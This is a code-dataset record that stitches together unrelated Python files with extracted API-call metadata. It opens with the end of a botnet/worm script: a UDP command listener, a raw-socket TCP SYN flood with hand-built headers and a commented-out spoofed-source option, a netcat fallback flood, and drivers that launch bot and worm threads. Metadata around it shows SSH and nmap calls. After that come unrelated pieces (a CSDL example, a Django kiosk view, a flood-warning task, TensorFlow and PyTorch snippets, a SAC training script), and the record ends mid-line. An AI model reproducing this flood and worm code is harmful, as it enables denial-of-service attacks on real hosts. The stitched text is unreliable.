threading.Thread(target=tcp_syn, args=(target,)).start()
def bot_driver():
""" Driver for the bot
"""
logger.info('LOADING BOT')
global state
threading.Thread(target=hello).start()
master_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
master_sock.bind(('', PORT))
#state = 0 # don't set bot to ready yet. potential race condition with worm driver
while True:
message = master_sock.recv(1024)
logger.info('Received: {}'.format(message))
threading.Thread(target=process_commands, args=(message,)).start()
master_sock.close()
##################################################################
# SYN FLOOD
##################################################################
def calculate_tcp_checksum(message):
""" Calculate the TCP checksum
@param message: payload + TCP headers + pseudoheader
@return: 16-bit TCP checksum value
"""
cs = 0
for i in range(0, len(message), 2):
w = (ord(message[i])<<8 + ord(message[i+1]))
cs = cs + w
cs = (cs>>16) + (cs & 0xffff)
cs = ~cs & 0xffff
return cs
def create_ip_header(src, dst):
""" Create the IP header
@param src: source IPv4 address in binary format
@param dst: destination IPv4 address in binary format
@return: IPv4 header
"""
# IPv4 header fields
v_ihl = 69 # 0x45; version 4, internet header length 5
dscp_ecn = 0 # type of service
total_len = 20 + 20 # length of packet; ip header + tcp header
ident = random.randint(0, 65535) # identification
flag_frag = 0 # flag and fragment offset
ttl = 255 # time to live
protocol = socket.IPPROTO_TCP # protocol; TCP
checksum = 0 # checksum value; python fills this out??
return struct.pack('!BBHHHBBH4s4s', v_ihl, dscp_ecn, total_len,
ident, flag_frag, ttl, protocol, checksum, src, dst)
def create_tcp_header(src, dst):
""" Create the TCP header
@param src: source IPv4 address in binary format
@param dst: destination IPv4 address in binary format
@return: TCP header
"""
# TCP header fields
src_port = 8008 #random.randint(1024, 65535) # source port, non-privileged
dest_port = 80 # destination port; http
seq = 0 # sequence number
ack = 0 # acknowledgement number
offset_reserved = 0x50 # data offset and reserved
flags = 2 # TCP flags; SYN flag = 1
window = socket.htons(5840) # window size
checksum = 0 # checksum value
urg = 0 # urgent pointer
temp = struct.pack('!HHLLBBHHH', src_port, dest_port, seq, ack,
offset_reserved, flags, window, checksum, urg)
# Psuedo header fields
protocol = socket.IPPROTO_TCP # protocol; TCP
tcp_len = len(temp) # length of tcp header + payload
psh = struct.pack('!4s4sHH', src, dst, protocol, tcp_len)
checksum = calculate_tcp_checksum(psh + temp)
return struct.pack('!HHLLBBHHH', src_port, dest_port, seq, ack,
offset_reserved, flags, window, checksum, urg)
def create_tcp_syn_packet(target):
""" Create the TCP SYN packet
@param target: IPv4 address
@return: TCP SYN packet
"""
'''
a = random.randint(1,255)
b = random.randint(1,255)
c = random.randint(1,255)
d = random.randint(1,255)
src_ip = '{}.{}.{}.{}'.format(a, b, c, d) # spoofed ip
'''
src_ip = ID
src = socket.inet_aton(src_ip) # source IP address
dst = socket.inet_aton(target) # destination IP address
packet = create_ip_header(src, dst) + create_tcp_header(src, dst)
return packet
def tcp_syn(target):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
while state == 1:
packet = create_tcp_syn_packet(target)
for _ in xrange(100):
if state != 1:
break
sock.sendto(packet, (target , 0))
sock.close()
except: # no root privilege
while state == 1:
os.system('nc ' + target + ' 80')
##################################################################
# MAIN DRIVER
# Starts the worm driver and the bot driver
##################################################################
def main():
""" Main driver for the bot
"""
global ID
if ID.startswith('127.'): # maybe in a VM environment
try:
import netinfo
ID = netinfo.get_ip('enp0s3')
except:
pass
threading.Thread(target=bot_driver).start()
threading.Thread(target=worm_driver, args=(ID,)).start()
if __name__ == '__main__':
main()
| [
"logging.basicConfig",
"logging.getLogger",
"netinfo.get_ip",
"paramiko.SSHClient",
"socket.socket",
"nmap.PortScanner",
"paramiko.AutoAddPolicy",
"os.system",
"socket.htons",
"time.sleep",
"struct.pack",
"socket.inet_aton",
"os.path.abspath",
"threading.Thread",
"socket.gethostname",
"random.randint",
"os.remove"
] | [((737, 896), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': '"""%(asctime)s PID:%(process)d %(threadName)s %(message)s"""', 'datefmt': '"""%H:%M:%S"""', 'filename': '"""/tmp/bot.log"""'}), "(level=logging.INFO, format=\n '%(asctime)s PID:%(process)d %(threadName)s %(message)s', datefmt=\n '%H:%M:%S', filename='/tmp/bot.log')\n", (756, 896), False, 'import logging\n'), ((956, 977), 'logging.getLogger', 'logging.getLogger', (['""""""'], {}), "('')\n", (973, 977), False, 'import logging\n'), ((411, 431), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (429, 431), False, 'import socket\n'), ((1722, 1742), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (1740, 1742), False, 'import paramiko\n'), ((2318, 2336), 'nmap.PortScanner', 'nmap.PortScanner', ([], {}), '()\n', (2334, 2336), False, 'import nmap\n'), ((6357, 6405), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (6370, 6405), False, 'import socket\n'), ((7087, 7135), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (7100, 7135), False, 'import socket\n'), ((7556, 7569), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (7566, 7569), False, 'import time\n'), ((8085, 8133), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (8098, 8133), False, 'import socket\n'), ((9388, 9412), 'random.randint', 'random.randint', (['(0)', '(65535)'], {}), '(0, 65535)\n', (9402, 9412), False, 'import random\n'), ((9625, 9738), 'struct.pack', 'struct.pack', (['"""!BBHHHBBH4s4s"""', 'v_ihl', 'dscp_ecn', 'total_len', 'ident', 'flag_frag', 'ttl', 'protocol', 'checksum', 'src', 'dst'], {}), "('!BBHHHBBH4s4s', v_ihl, dscp_ecn, total_len, ident, flag_frag,\n ttl, protocol, checksum, src, dst)\n", (9636, 9738), False, 'import struct\n'), ((10267, 10285), 'socket.htons', 'socket.htons', (['(5840)'], {}), '(5840)\n', (10279, 10285), False, 'import socket\n'), ((10374, 10481), 'struct.pack', 'struct.pack', (['"""!HHLLBBHHH"""', 'src_port', 'dest_port', 'seq', 'ack', 'offset_reserved', 'flags', 'window', 'checksum', 'urg'], {}), "('!HHLLBBHHH', src_port, dest_port, seq, ack, offset_reserved,\n flags, window, checksum, urg)\n", (10385, 10481), False, 'import struct\n'), ((10628, 10679), 'struct.pack', 'struct.pack', (['"""!4s4sHH"""', 'src', 'dst', 'protocol', 'tcp_len'], {}), "('!4s4sHH', src, dst, protocol, tcp_len)\n", (10639, 10679), False, 'import struct\n'), ((10743, 10850), 'struct.pack', 'struct.pack', (['"""!HHLLBBHHH"""', 'src_port', 'dest_port', 'seq', 'ack', 'offset_reserved', 'flags', 'window', 'checksum', 'urg'], {}), "('!HHLLBBHHH', src_port, dest_port, seq, ack, offset_reserved,\n flags, window, checksum, urg)\n", (10754, 10850), False, 'import struct\n'), ((11211, 11235), 'socket.inet_aton', 'socket.inet_aton', (['src_ip'], {}), '(src_ip)\n', (11227, 11235), False, 'import socket\n'), ((11266, 11290), 'socket.inet_aton', 'socket.inet_aton', (['target'], {}), '(target)\n', (11282, 11290), False, 'import socket\n'), ((1779, 1803), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (1801, 1803), False, 'import paramiko\n'), ((2844, 2872), 'os.path.abspath', 'os.path.abspath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (2859, 2872), False, 'import os\n'), ((6536, 6550), 'time.sleep', 'time.sleep', (['(60)'], {}), '(60)\n', (6546, 6550), False, 'import time\n'), ((11453, 11519), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_RAW', 'socket.IPPROTO_RAW'], {}), '(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)\n', (11466, 11519), False, 'import socket\n'), ((8027, 8057), 'threading.Thread', 'threading.Thread', ([], {'target': 'hello'}), '(target=hello)\n', (8043, 8057), False, 'import threading\n'), ((12319, 12343), 'netinfo.get_ip', 'netinfo.get_ip', (['"""enp0s3"""'], {}), "('enp0s3')\n", (12333, 12343), False, 'import netinfo\n'), ((12382, 12417), 'threading.Thread', 'threading.Thread', ([], {'target': 'bot_driver'}), '(target=bot_driver)\n', (12398, 12417), False, 'import threading\n'), ((12430, 12478), 'threading.Thread', 'threading.Thread', ([], {'target': 'worm_driver', 'args': '(ID,)'}), '(target=worm_driver, args=(ID,))\n', (12446, 12478), False, 'import threading\n'), ((4497, 4533), 'os.remove', 'os.remove', (["('/tmp/' + target + '.txt')"], {}), "('/tmp/' + target + '.txt')\n", (4506, 4533), False, 'import os\n'), ((7859, 7907), 'threading.Thread', 'threading.Thread', ([], {'target': 'tcp_syn', 'args': '(target,)'}), '(target=tcp_syn, args=(target,))\n', (7875, 7907), False, 'import threading\n'), ((8372, 8430), 'threading.Thread', 'threading.Thread', ([], {'target': 'process_commands', 'args': '(message,)'}), '(target=process_commands, args=(message,))\n', (8388, 8430), False, 'import threading\n'), ((11896, 11929), 'os.system', 'os.system', (["('nc ' + target + ' 80')"], {}), "('nc ' + target + ' 80')\n", (11905, 11929), False, 'import os\n')] |
def example(Simulator):
from csdl import Model
import csdl
import numpy as np
class ExampleElementwise(Model):
def define(self):
m = 2
n = 3
# Shape of the three tensors is (2,3)
shape = (m, n)
# Creating the values for two tensors
val1 = np.array([[1, 5, -8], [10, -3, -5]])
val2 = np.array([[2, 6, 9], [-1, 2, 4]])
# Declaring the two input tensors
tensor1 = self.declare_variable('tensor1', val=val1)
tensor2 = self.declare_variable('tensor2', val=val2)
# Creating the output for matrix multiplication
ma = self.register_output('ElementwiseMax',
csdl.max(tensor1, tensor2))
assert ma.shape == (2, 3)
sim = Simulator(ExampleElementwise())
sim.run()
print('tensor1', sim['tensor1'].shape)
print(sim['tensor1'])
print('tensor2', sim['tensor2'].shape)
print(sim['tensor2'])
print('ElementwiseMax', sim['ElementwiseMax'].shape)
print(sim['ElementwiseMax'])
return sim | [
"numpy.array",
"csdl.max"
] | [((360, 396), 'numpy.array', 'np.array', (['[[1, 5, -8], [10, -3, -5]]'], {}), '([[1, 5, -8], [10, -3, -5]])\n', (368, 396), True, 'import numpy as np\n'), ((416, 449), 'numpy.array', 'np.array', (['[[2, 6, 9], [-1, 2, 4]]'], {}), '([[2, 6, 9], [-1, 2, 4]])\n', (424, 449), True, 'import numpy as np\n'), ((790, 816), 'csdl.max', 'csdl.max', (['tensor1', 'tensor2'], {}), '(tensor1, tensor2)\n', (798, 816), False, 'import csdl\n')] |
from django.views.generic.base import TemplateView
from django.shortcuts import get_object_or_404, render
from .models import Kiosk
from event_kiosk.presentations.models import Slide
from django.views.decorators.csrf import csrf_exempt
from django.http import JsonResponse
import django.utils.timezone as timezone
import os
import datetime
class KioskView(TemplateView):
template_name = "kiosk.html"
def get_context_data(self, **kwargs):
slug = kwargs['name']
kiosk = get_object_or_404(Kiosk, name=slug)
context = super(KioskView, self).get_context_data(**kwargs)
context['kiosk'] = kiosk.name
return context
@csrf_exempt
def kiosk_data(request, **kwargs):
slug = kwargs['name']
kiosk = get_object_or_404(Kiosk, name=slug)
currentPresentation = kiosk.presentation
# construct the JSON representation of the kiosk
for scheduledPresentation in kiosk.kioskpresentationcalendar_set.all():
if scheduledPresentation.endTime > timezone.now() >= scheduledPresentation.startTime:
currentPresentation = scheduledPresentation.scheduledPresentation
# Clean up past KioskPresentationCalendar (the presentation itself is not deleted)
elif timezone.now() > scheduledPresentation.endTime:
scheduledPresentation.delete()
sections = []
for section in kiosk.sections.all():
sections.append(section.to_json())
slides = []
for slide in currentPresentation.slides.all():
if (slide.type == Slide.EVENT and
(timezone.now().date() > slide.event.date or
(
timezone.now().date() == slide.event.date and
timezone.now().time() > slide.event.endTime
)
)):
# Clean up past event slides (the event itself is not deleted)
slide.delete()
else:
slides.append(slide.to_json())
# Get header image if exists
presentation = {
'headerImage': currentPresentation.headerImage.url if currentPresentation.headerImage else None,
'transitionTime': currentPresentation.transitionTime * 1000,
'pauseTimeOnTouch': currentPresentation.pauseTimeOnTouch * 1000,
'slides': slides,
'displayMenu': currentPresentation.displayMenu,
'displayIndicators': currentPresentation.displayIndicators
}
kiosk = {
'appVersion': os.environ.get('APP_VERSION'),
'presentation': presentation,
'sections': sections
}
return JsonResponse(kiosk)
def appcache_manifest(request, **kwargs):
return render(request, 'appcache.html', content_type="text/cache-manifest; charset=utf-8")
| [
"django.shortcuts.render",
"django.http.JsonResponse",
"django.shortcuts.get_object_or_404",
"os.environ.get",
"django.utils.timezone.now"
] | [((749, 784), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Kiosk'], {'name': 'slug'}), '(Kiosk, name=slug)\n', (766, 784), False, 'from django.shortcuts import get_object_or_404, render\n'), ((2549, 2568), 'django.http.JsonResponse', 'JsonResponse', (['kiosk'], {}), '(kiosk)\n', (2561, 2568), False, 'from django.http import JsonResponse\n'), ((2623, 2711), 'django.shortcuts.render', 'render', (['request', '"""appcache.html"""'], {'content_type': '"""text/cache-manifest; charset=utf-8"""'}), "(request, 'appcache.html', content_type=\n 'text/cache-manifest; charset=utf-8')\n", (2629, 2711), False, 'from django.shortcuts import get_object_or_404, render\n'), ((496, 531), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Kiosk'], {'name': 'slug'}), '(Kiosk, name=slug)\n', (513, 531), False, 'from django.shortcuts import get_object_or_404, render\n'), ((2433, 2462), 'os.environ.get', 'os.environ.get', (['"""APP_VERSION"""'], {}), "('APP_VERSION')\n", (2447, 2462), False, 'import os\n'), ((1003, 1017), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1015, 1017), True, 'import django.utils.timezone as timezone\n'), ((1236, 1250), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1248, 1250), True, 'import django.utils.timezone as timezone\n'), ((1553, 1567), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1565, 1567), True, 'import django.utils.timezone as timezone\n'), ((1635, 1649), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1647, 1649), True, 'import django.utils.timezone as timezone\n'), ((1701, 1715), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1713, 1715), True, 'import django.utils.timezone as timezone\n')] |
# <NAME> 2022
# Task 2B
#
from floodsystem.flood import stations_level_over_threshold
from floodsystem.stationdata import build_station_list, update_water_levels
def run():
stations = build_station_list()
update_water_levels(stations)
stations_over = stations_level_over_threshold(stations,0.8) #defines the list stations_over as any (valid data) station where the recent relative level is over 0.8
print("The stations currently above the tolerance are:")
for i in range(len(stations_over)):
print((stations_over[i][0]).name, (stations_over[i][0].relative_water_level()))#prints the station name and relative water level
if __name__ == "__main__":
print("*** Task 2B: CUED Part IA Flood Warning System ***")
run() | [
"floodsystem.stationdata.build_station_list",
"floodsystem.flood.stations_level_over_threshold",
"floodsystem.stationdata.update_water_levels"
] | [((190, 210), 'floodsystem.stationdata.build_station_list', 'build_station_list', ([], {}), '()\n', (208, 210), False, 'from floodsystem.stationdata import build_station_list, update_water_levels\n'), ((215, 244), 'floodsystem.stationdata.update_water_levels', 'update_water_levels', (['stations'], {}), '(stations)\n', (234, 244), False, 'from floodsystem.stationdata import build_station_list, update_water_levels\n'), ((266, 310), 'floodsystem.flood.stations_level_over_threshold', 'stations_level_over_threshold', (['stations', '(0.8)'], {}), '(stations, 0.8)\n', (295, 310), False, 'from floodsystem.flood import stations_level_over_threshold\n')] |
""" Test case for the HierarchyWidget """
from tempfile import mkdtemp
from pySUMOQt import MainWindow
import pysumo
import shutil
"""
Steps:
1. Open pySUMO
2. Open HierarchyWidget
3. Open Merge.kif
4. Type instance into the Relation field
4a. Press Enter
5. Type unitofcurrency into the Node field
5a. Press Enter
6. Type subrelation into the Relation field
6a. Press Enter
7. Collapse all
8. Expand all
"""
if __name__ == "__main__":
tmpdir = mkdtemp()
pysumo.CONFIG_PATH = tmpdir
MainWindow.main()
shutil.rmtree(tmpdir, ignore_errors=True)
| [
"pySUMOQt.MainWindow.main",
"tempfile.mkdtemp",
"shutil.rmtree"
] | [((450, 459), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (457, 459), False, 'from tempfile import mkdtemp\n'), ((496, 513), 'pySUMOQt.MainWindow.main', 'MainWindow.main', ([], {}), '()\n', (511, 513), False, 'from pySUMOQt import MainWindow\n'), ((518, 559), 'shutil.rmtree', 'shutil.rmtree', (['tmpdir'], {'ignore_errors': '(True)'}), '(tmpdir, ignore_errors=True)\n', (531, 559), False, 'import shutil\n')] |
import torch
import config as c
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
IN_WEIGHTS_FILE = c.BASE_DIRECTORY + "/" + c.FILENAME # Name of the file having weights to be transferred.
class Init_weights:
"""Transfer weights based on specific method."""
def __init__(self):
self.weights = torch.load(IN_WEIGHTS_FILE, map_location=torch.device('cpu'))
def weight_transfer(self, transfer_method, fc1_shape):
"""
Parameters:
transfer_method (int): Value 0 to 6 for different methods.
fc1_shape (): Shape of first hidden layer
"""
# Architecture changes
w = self.weights
if transfer_method == 1:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc2_.weight'].T
ind = int(w.shape[0] / fc1_shape)
x = torch.mean(w[:ind], dim=0).unsqueeze(1)
for i in range(2, fc1_shape + 1):
x = torch.cat((x, torch.mean(w[:ind], dim=0).unsqueeze(1)), dim=1)
w = x
elif transfer_method == 2:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc2.weight']
w = torch.cat((w, torch.zeros(144, 120).to(device)), dim=1)
w = torch.cat((w, torch.zeros(48, 192).to(device)), dim=0)
elif transfer_method == 3:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc2.weight']
w = torch.cat((w, torch.zeros(144, 120).to(device)), dim=1)
ind = int(w.shape[0] / fc1_shape)
x = torch.mean(w[:ind], dim=0).unsqueeze(1)
for i in range(2, fc1_shape + 1):
x = torch.cat((x, torch.mean(w[:ind], dim=0).unsqueeze(1)), dim=1)
w = x
# Information extraction
elif transfer_method == 4:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc3.weight'].T
w = torch.cat((w, torch.zeros(w.shape).to(device)), dim=1)
elif transfer_method == 5:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc3.weight'].T
w = torch.cat((w, w), dim=1)
elif transfer_method == 6:
print("Weights Loaded for ", transfer_method)
w = self.weights['fc3.weight']
w = repeat(w, [2, 1]).T
return w
def repeat(t, dims):
"""
parameters:
t (tensor): Original tensor
dims: dimensions
"""
if len(dims) != len(t.shape):
raise ValueError("Number of dimensions of tensor should be equal to length of dims")
for index, dim in enumerate(dims):
repeat_vector = [1] * (len(dims) + 1)
repeat_vector[index + 1] = dim
new_shape = list(t.shape)
new_shape[index] *= dim
t = t.unsqueeze(index + 1).repeat(repeat_vector).reshape(new_shape)
return t
| [
"torch.mean",
"torch.cuda.is_available",
"torch.zeros",
"torch.cat",
"torch.device"
] | [((68, 93), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (91, 93), False, 'import torch\n'), ((378, 397), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (390, 397), False, 'import torch\n'), ((886, 912), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (896, 912), False, 'import torch\n'), ((1624, 1650), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (1634, 1650), False, 'import torch\n'), ((2210, 2234), 'torch.cat', 'torch.cat', (['(w, w)'], {'dim': '(1)'}), '((w, w), dim=1)\n', (2219, 2234), False, 'import torch\n'), ((1006, 1032), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (1016, 1032), False, 'import torch\n'), ((1240, 1261), 'torch.zeros', 'torch.zeros', (['(144)', '(120)'], {}), '(144, 120)\n', (1251, 1261), False, 'import torch\n'), ((1312, 1332), 'torch.zeros', 'torch.zeros', (['(48)', '(192)'], {}), '(48, 192)\n', (1323, 1332), False, 'import torch\n'), ((1520, 1541), 'torch.zeros', 'torch.zeros', (['(144)', '(120)'], {}), '(144, 120)\n', (1531, 1541), False, 'import torch\n'), ((1744, 1770), 'torch.mean', 'torch.mean', (['w[:ind]'], {'dim': '(0)'}), '(w[:ind], dim=0)\n', (1754, 1770), False, 'import torch\n'), ((2014, 2034), 'torch.zeros', 'torch.zeros', (['w.shape'], {}), '(w.shape)\n', (2025, 2034), False, 'import torch\n')] |
import tensorflow as tf
"""tf.lbeta(x,name=None)
功能:计算`ln(|Beta(x)|)`,并以最末尺度进行归纳。
最末尺度`z = [z_0,...,z_{K-1}]`,则Beta(z) = \prod_j Gamma(z_j) / Gamma(\sum_j z_j)
输入:x为秩为n+1的张量,可以为'float','double'类型。"""
x = tf.constant([[4, 3, 3], [2, 3, 2]], tf.float64)
z = tf.lbeta(x)
# ln(gamma(4)*gamma(3)*gamma(3)/gamma(4+3+3))=ln(6*2*2/362880)=-9.62377365
# ln(gamma(2)*gamma(3)*gamma(2)/gamma(2+3+2))=ln(2/720)=-5.88610403
sess = tf.Session()
print(sess.run(z))
sess.close()
# z==>[-9.62377365 -5.88610403]
# 这是beta函数的计算法,是以gama函数作为基础的所谓伽马函数即是(n-1)!
# 例如:gama(4)=3*2*1=6
| [
"tensorflow.Session",
"tensorflow.constant",
"tensorflow.lbeta"
] | [((215, 262), 'tensorflow.constant', 'tf.constant', (['[[4, 3, 3], [2, 3, 2]]', 'tf.float64'], {}), '([[4, 3, 3], [2, 3, 2]], tf.float64)\n', (226, 262), True, 'import tensorflow as tf\n'), ((267, 278), 'tensorflow.lbeta', 'tf.lbeta', (['x'], {}), '(x)\n', (275, 278), True, 'import tensorflow as tf\n'), ((430, 442), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (440, 442), True, 'import tensorflow as tf\n')] |
#!/usr/bin/env python
# coding: utf-8
"""
Implementation of Soft Actor Critic (SAC) network
using PyTorch and Stable Baselines 3.
See https://stable-baselines3.readthedocs.io/en/master/modules/sac.html for algorithm details.
@author: <NAME> 2020 (<EMAIL>)
Project for CityLearn Competition
"""
import torch
import numpy as np
import gym
from stable_baselines3.sac.policies import MlpPolicy as MlpPolicy_SAC
from stable_baselines3 import SAC
from stable_baselines3.common.callbacks import BaseCallback
from stable_baselines3.common import make_vec_env, results_plotter
from stable_baselines3.common.monitor import Monitor
from stable_baselines3.common.results_plotter import plot_results
from stable_baselines3.common.vec_env.base_vec_env import VecEnv
from citylearn import CityLearn
from pkg3_utils import available_cpu_count as cpu_cores, SaveOnBestTrainingRewardCallback, TensorboardCallback
import matplotlib.pyplot as plt
from pathlib import Path
import warnings
import time, sys, os
import pprint as pp
from torch.utils.tensorboard import writer
# Ignore the float32 bound precision warning
warnings.simplefilter("ignore", UserWarning)
# Central agent controlling the buildings using the OpenAI Stable Baselines
climate_zone = 1
data_path = Path("data/Climate_Zone_"+str(climate_zone))
building_attributes = data_path / 'building_attributes.json'
weather_file = data_path / 'weather_data.csv'
solar_profile = data_path / 'solar_generation_1kW.csv'
building_state_actions = 'buildings_state_action_space.json'
building_ids = ['Building_1',"Building_2","Building_3","Building_4","Building_5","Building_6","Building_7","Building_8","Building_9"]
# building_ids = ['Building_1', 'Building_2']
objective_function = ['ramping','1-load_factor','average_daily_peak','peak_demand','net_electricity_consumption']
env = CityLearn(data_path, building_attributes, weather_file, solar_profile, building_ids, buildings_states_actions = building_state_actions,
cost_function = objective_function, central_agent = True, verbose = 1)
# Store the weights and scores in a new directory
parent_dir = "alg/sac_{}/".format(time.strftime("%Y%m%d-%H%M%S")) # apprends the timedate
os.makedirs(parent_dir, exist_ok=True)
# Create log dir
log_dir = parent_dir+"monitor"
os.makedirs(log_dir, exist_ok=True)
# Set the interval and their count
interval = 8760
icount = int(sys.argv[1]) if len(sys.argv) > 1 else 10
log_interval = 1
check_interval = 1
# Policy kwargs
policy_kwargs = dict(
net_arch=[128,128]
)
# Make VecEnv + Wrap in Monitor
env = Monitor(env, filename=log_dir)
callbackBest = SaveOnBestTrainingRewardCallback(check_freq=check_interval*interval, log_dir=log_dir)
callbackTB = TensorboardCallback()
# Add callbacks to the callback list
callbackList = []
useBestCallback = True
useTensorboardCallback = True # Not working yet
if useBestCallback:
callbackList.append(callbackBest)
if useTensorboardCallback:
callbackList.append(callbackTB)
model = SAC(MlpPolicy_SAC, env, verbose=1, learning_rate=0.005, gamma=0.99, tau=3e-4, batch_size=2048, train_freq=25,
target_update_interval=25, policy_kwargs=policy_kwargs, learning_starts=interval-1, tensorboard_log=parent_dir+"tensorboard/")
print()
model.learn(total_timesteps=interval*icount, log_interval=log_interval, tb_log_name="", callback=callbackList)
# Summary Writer setup
# Writer will output to ./runs/ directory by default
writer = writer.SummaryWriter(log_dir=parent_dir+"tensorboard/_1")
print("Saving TB to {}".format(parent_dir+"tensorboard/_1"))
iteration_step = 0
obs = env.reset()
dones = False
counter = []
# One episode
while dones==False:
action, _states = model.predict(obs)
obs, rewards, dones, info = env.step(action)
counter.append(rewards)
# Logging
if iteration_step % interval:
# Building reward
writer.add_scalar("Reward/Buildings", rewards, iteration_step)
iteration_step += 1
# Costs
writer.add_scalars("Scores", env.cost(), iteration_step)
# writer.add_scalar("Scores/ramping", env.cost()['ramping'], iteration_step)
# writer.add_scalar("Scores/1-load_factor", env.cost()['1-load_factor'], iteration_step)
# writer.add_scalar("Scores/average_daily_peak", env.cost()['average_daily_peak'], iteration_step)
# writer.add_scalar("Scores/peak_demand", env.cost()['peak_demand'], iteration_step)
# writer.add_scalar("Scores/net_electricity_consumption", env.cost()['net_electricity_consumption'], iteration_step)
# writer.add_scalar("Scores/total", env.cost()['total'], iteration_step)
env.close()
print("\nFinal rewards:")
pp.pprint(env.cost())
# Plot the reward graph
# plot_results([log_dir], interval*icount, results_plotter.X_TIMESTEPS, "SAC CityLearn")
# plt.savefig(log_dir+"/rewards.pdf") | [
"stable_baselines3.SAC",
"os.makedirs",
"pkg3_utils.TensorboardCallback",
"torch.utils.tensorboard.writer.SummaryWriter",
"time.strftime",
"citylearn.CityLearn",
"stable_baselines3.common.monitor.Monitor",
"warnings.simplefilter",
"torch.utils.tensorboard.writer.add_scalar",
"pkg3_utils.SaveOnBestTrainingRewardCallback"
] | [((1104, 1148), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""', 'UserWarning'], {}), "('ignore', UserWarning)\n", (1125, 1148), False, 'import warnings\n'), ((1823, 2029), 'citylearn.CityLearn', 'CityLearn', (['data_path', 'building_attributes', 'weather_file', 'solar_profile', 'building_ids'], {'buildings_states_actions': 'building_state_actions', 'cost_function': 'objective_function', 'central_agent': '(True)', 'verbose': '(1)'}), '(data_path, building_attributes, weather_file, solar_profile,\n building_ids, buildings_states_actions=building_state_actions,\n cost_function=objective_function, central_agent=True, verbose=1)\n', (1832, 2029), False, 'from citylearn import CityLearn\n'), ((2187, 2225), 'os.makedirs', 'os.makedirs', (['parent_dir'], {'exist_ok': '(True)'}), '(parent_dir, exist_ok=True)\n', (2198, 2225), False, 'import time, sys, os\n'), ((2275, 2310), 'os.makedirs', 'os.makedirs', (['log_dir'], {'exist_ok': '(True)'}), '(log_dir, exist_ok=True)\n', (2286, 2310), False, 'import time, sys, os\n'), ((2557, 2587), 'stable_baselines3.common.monitor.Monitor', 'Monitor', (['env'], {'filename': 'log_dir'}), '(env, filename=log_dir)\n', (2564, 2587), False, 'from stable_baselines3.common.monitor import Monitor\n'), ((2603, 2694), 'pkg3_utils.SaveOnBestTrainingRewardCallback', 'SaveOnBestTrainingRewardCallback', ([], {'check_freq': '(check_interval * interval)', 'log_dir': 'log_dir'}), '(check_freq=check_interval * interval,\n log_dir=log_dir)\n', (2635, 2694), False, 'from pkg3_utils import available_cpu_count as cpu_cores, SaveOnBestTrainingRewardCallback, TensorboardCallback\n'), ((2702, 2723), 'pkg3_utils.TensorboardCallback', 'TensorboardCallback', ([], {}), '()\n', (2721, 2723), False, 'from pkg3_utils import available_cpu_count as cpu_cores, SaveOnBestTrainingRewardCallback, TensorboardCallback\n'), ((2983, 3238), 'stable_baselines3.SAC', 'SAC', (['MlpPolicy_SAC', 'env'], {'verbose': '(1)', 'learning_rate': '(0.005)', 'gamma': '(0.99)', 'tau': '(0.0003)', 'batch_size': '(2048)', 'train_freq': '(25)', 'target_update_interval': '(25)', 'policy_kwargs': 'policy_kwargs', 'learning_starts': '(interval - 1)', 'tensorboard_log': "(parent_dir + 'tensorboard/')"}), "(MlpPolicy_SAC, env, verbose=1, learning_rate=0.005, gamma=0.99, tau=\n 0.0003, batch_size=2048, train_freq=25, target_update_interval=25,\n policy_kwargs=policy_kwargs, learning_starts=interval - 1,\n tensorboard_log=parent_dir + 'tensorboard/')\n", (2986, 3238), False, 'from stable_baselines3 import SAC\n'), ((3429, 3488), 'torch.utils.tensorboard.writer.SummaryWriter', 'writer.SummaryWriter', ([], {'log_dir': "(parent_dir + 'tensorboard/_1')"}), "(log_dir=parent_dir + 'tensorboard/_1')\n", (3449, 3488), False, 'from torch.utils.tensorboard import writer\n'), ((2131, 2161), 'time.strftime', 'time.strftime', (['"""%Y%m%d-%H%M%S"""'], {}), "('%Y%m%d-%H%M%S')\n", (2144, 2161), False, 'import time, sys, os\n'), ((3844, 3906), 'torch.utils.tensorboard.writer.add_scalar', 'writer.add_scalar', (['"""Reward/Buildings"""', 'rewards', 'iteration_step'], {}), "('Reward/Buildings', rewards, iteration_step)\n", 